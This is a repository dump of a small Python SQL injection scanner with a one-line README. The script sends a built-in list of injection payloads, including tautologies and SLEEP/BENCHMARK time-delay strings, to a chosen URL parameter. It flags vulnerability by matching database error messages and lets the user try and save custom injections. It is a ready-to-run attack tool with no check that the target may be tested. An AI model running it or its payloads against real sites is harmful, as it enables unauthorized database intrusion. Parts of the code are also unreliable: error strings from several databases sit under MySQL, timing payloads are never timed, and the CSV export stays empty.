├── README.md └── SQLInjection.py /README.md: -------------------------------------------------------------------------------- 1 | # sqlScanner 2 | This is a script that scans an IP address or URL for SQL Injection vulnerabilities. If any are found, it includes an extensive library of ready-to-use injection techniques, and you can also utilize your own custom injections. 3 | -------------------------------------------------------------------------------- /SQLInjection.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import requests 4 | import argparse 5 | import csv 6 | import concurrent.futures 7 | 8 | # Default payloads 9 | default_payloads = [ 10 | "' OR '1'='1", 11 | "' OR '1'='1' --", 12 | "' OR '1'='1' #", 13 | "' OR '1'='1' /*", 14 | "' OR 'a'='a", 15 | "' OR 'a'='a' --", 16 | "' OR 'a'='a' #", 17 | "' OR 'a'='a' /*", 18 | "' OR 1=1", 19 | "' OR 1=1 --", 20 | "' OR 1=1 #", 21 | "' OR 1=1 /*", 22 | "' OR '1'='1' AND SLEEP(5) --", 23 | "' OR '1'='1' AND BENCHMARK(1000000,MD5(1)) --", 24 | ] 25 | 26 | # SQL errors for different databases 27 | db_errors = { 28 | 'MySQL': [ 29 | "You have an error in your SQL syntax;", 30 | "Warning: mysql_fetch_assoc()", 31 | "Warning: mysql_num_rows()", 32 | "Warning: mysql_fetch_array()", 33 | "Unclosed quotation mark after the character string", 34 | "Microsoft OLE DB Provider for SQL Server", 35 | "mysql_num_rows() expects parameter 1 to be resource", 36 | "supplied argument is not a valid MySQL", 37 | "ORA-01756", 38 | "Error: unknown column", 39 | "Query failed", 40 | "SQLSTATE", 41 | "Warning: pg_exec", 42 | "pg_query(): Query failed", 43 | "unterminated quoted string", 44 | ], 45 | 'PostgreSQL': [ 46 | "ERROR: syntax error at or near", 47 | "pg_query(): Query failed", 48 | ], 49 | 'MSSQL': [ 50 | "SQL Server does not exist or access denied", 51 | "OLE DB provider for linked server", 52 | ], 53 | # Add more databases as needed 54 | } 55 | 56 | def is_vulnerable(response, db_type='MySQL'): 57 | """Analyze the response to determine if there is a possible SQL injection.""" 58 | for error in db_errors.get(db_type, []): 59 | if error.lower() in response.text.lower(): 60 | return True 61 | return False 62 | 63 | def make_request(url, param, payload, method='GET', cookies=None): 64 | """Make a request to the URL with the given payload.""" 65 | session = requests.Session() 66 | if cookies: 67 | session.cookies.update(cookies) 68 | 69 | if method == 'POST': 70 | return session.post(url, data={param: payload}) 71 | elif method == 'PUT': 72 | return session.put(url, data={param: payload}) 73 | elif method == 'DELETE': 74 | return session.delete(url, data={param: payload}) 75 | else: 76 | return session.get(url, params={param: payload}) 77 | 78 | def test_sql_injection(url, param, payloads, method='GET', cookies=None): 79 | """Test for SQL Injection vulnerabilities.""" 80 | with concurrent.futures.ThreadPoolExecutor() as executor: 81 | future_to_payload = {executor.submit(make_request, url, param, payload, method, cookies): payload for payload in payloads} 82 | for future in concurrent.futures.as_completed(future_to_payload): 83 | payload = future_to_payload[future] 84 | try: 85 | response = future.result() 86 | if is_vulnerable(response): 87 | print(f"Possible SQL Injection vulnerability detected with payload: {payload}") 88 | return True 89 | except Exception as exc: 90 | print(f'Payload {payload} generated an exception: {exc}') 91 | return False 92 | 93 | def export_results(results, filename='results.csv'): 94 | """Export results to a CSV file.""" 95 | with open(filename, 'w', newline='') as csvfile: 96 | fieldnames = ['URL', 'Parameter', 'Payload', 'Vulnerable'] 97 | writer = csv.DictWriter(csvfile, fieldnames=fieldnames) 98 | writer.writeheader() 99 | for result in results: 100 | writer.writerow(result) 101 | 102 | def main(): 103 | # Custom startup message 104 | print("██████╗░██╗░░░░░██╗███╗░░██╗██████╗░███╗░░░███╗░█████╗░░░███╗░░██████╗░███████╗███╗░░██╗") 105 | print("██╔══██╗██║░░░░░██║████╗░██║██╔══██╗████╗░████║██╔══██╗░████║░░██╔══██╗██╔════╝████╗░██║") 106 | print("██████╦╝██║░░░░░██║██╔██╗██║██║░░██║██╔████╔██║███████║██╔██║░░██║░░██║█████╗░░██╔██╗██║") 107 | print("██╔══██╗██║░░░░░██║██║╚████║██║░░██║██║╚██╔╝██║██╔══██║╚═╝██║░░██║░░██║██╔══╝░░██║╚████║") 108 | print("██████╦╝███████╗██║██║░╚███║██████╔╝██║░╚═╝░██║██║░░██║███████╗██████╔╝███████╗██║░╚███║") 109 | print("╚═════╝░╚══════╝╚═╝╚═╝░░╚══╝╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚══════╝╚═════╝░╚══════╝╚═╝░░╚══╝") 110 | print("SQLScanner") 111 | print("Author: @blindma1den.\n") 112 | 113 | parser = argparse.ArgumentParser(description="SQL Injection vulnerability detector") 114 | parser.add_argument("url", help="Target URL (e.g., http://example.com/search.php)") 115 | parser.add_argument("param", help="Parameter to test for SQL Injection") 116 | parser.add_argument("--method", choices=['GET', 'POST', 'PUT', 'DELETE'], default='GET', help="HTTP method to use") 117 | parser.add_argument("--cookies", help="Cookies to include in the requests (format: key=value,key=value)") 118 | parser.add_argument("--custom-payloads", help="File with custom payloads", type=argparse.FileType('r')) 119 | parser.add_argument("--save-payload", help="Save custom payload to file", type=str) 120 | parser.add_argument("--export-results", help="Export results to a CSV file", type=str) 121 | 122 | args = parser.parse_args() 123 | url = args.url 124 | param = args.param 125 | method = args.method 126 | 127 | # Convert cookies string to dictionary 128 | cookies = None 129 | if args.cookies: 130 | cookies = dict(cookie.split('=') for cookie in args.cookies.split(',')) 131 | 132 | # Load payloads 133 | payloads = default_payloads 134 | if args.custom_payloads: 135 | payloads = [line.strip() for line in args.custom_payloads] 136 | 137 | print(f"Testing {url} for SQL Injection vulnerabilities on parameter '{param}' with method '{method}'...") 138 | 139 | results = [] 140 | if test_sql_injection(url, param, payloads, method, cookies): 141 | print("The site is vulnerable to SQL Injection.") 142 | while True: 143 | option = input("Do you want to test more injections? (y/n): ").strip().lower() 144 | if option == 'n': 145 | break 146 | elif option == 'y': 147 | custom_payload = input("Enter the SQL injection to test: ").strip() 148 | if test_sql_injection(url, param, [custom_payload], method, cookies): 149 | print(f"The custom payload '{custom_payload}' is vulnerable.") 150 | if args.save_payload: 151 | with open(args.save_payload, 'a') as file: 152 | file.write(custom_payload + '\n') 153 | print(f"Payload '{custom_payload}' saved to {args.save_payload}.") 154 | else: 155 | print(f"The custom payload '{custom_payload}' is not vulnerable.") 156 | else: 157 | print("Invalid option. Please enter 'y' or 'n'.") 158 | else: 159 | print("No SQL Injection vulnerabilities detected.") 160 | 161 | # Export results if needed 162 | if args.export_results: 163 | export_results(results, args.export_results) 164 | print(f"Results exported to {args.export_results}.") 165 | 166 | if __name__ == "__main__": 167 | main() 168 | --------------------------------------------------------------------------------